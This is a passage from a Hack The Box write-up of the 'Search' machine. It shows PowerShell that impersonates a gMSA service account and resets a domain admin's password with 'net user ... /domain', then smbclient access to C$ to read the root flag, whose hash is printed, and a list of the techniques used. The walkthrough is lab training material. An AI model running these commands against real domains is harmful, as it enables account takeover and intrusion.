$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword

With these above we are setting up the GMSA password to be used and runas ‘BIR-ADFS-GMSA$’ user.

Everything is set, now we need to invoke commands to run any type of script/command.

1
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

For that we will use above command to know which user access we have right now.

As you can see ‘whoami’ result is showing that we are ‘BIR-ADFS-GMSA$’ user, not ‘Sierra’. Let’s look into Bloodhound one more time.

Let’s look into help of ‘Generic all’.

As you can see ‘Generic All’ privileges simply means full control over ‘Tristan’ user, who is also a domain admin. Let’s change the domain admin password.

1
2
3
4
5
PS C:\Users\Sierra.Frye\Documents> 

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}

The command completed successfully.

Now we can access admin directory to read the root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/C$ -U Tristan.Davies
Enter WORKGROUP\Tristan.Davies's password:
Try "help" to get a list of possible commands.
smb: \> cd \Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
. DRc 0 Mon Nov 22 15:21:49 2021
.. DRc 0 Mon Nov 22 15:21:49 2021
desktop.ini AHS 282 Mon Nov 22 15:21:49 2021
root.txt ARc 34 Fri Jan 7 11:13:49 2022

3246079 blocks of size 4096. 461189 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)


┌──(root💀kali)-[~/hackthebox/machine/search]
└─# cat root.txt
e66ca102d9ee6b0894fffa9a65b13e18

Summary of knowledge

  • kerbrute enumerate valid usernames
  • crackmapexec password spray
  • bloodhound information gathering
  • Kerberoasting without SPNs
  • hashcat crack service account’s hash
  • XLS file remove password protection
  • browser digital certificate password crack using p12tool
  • using gMSADumper read GMSA password
  • change the domain admin password to privesc

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…

Welcome to my other publishing channels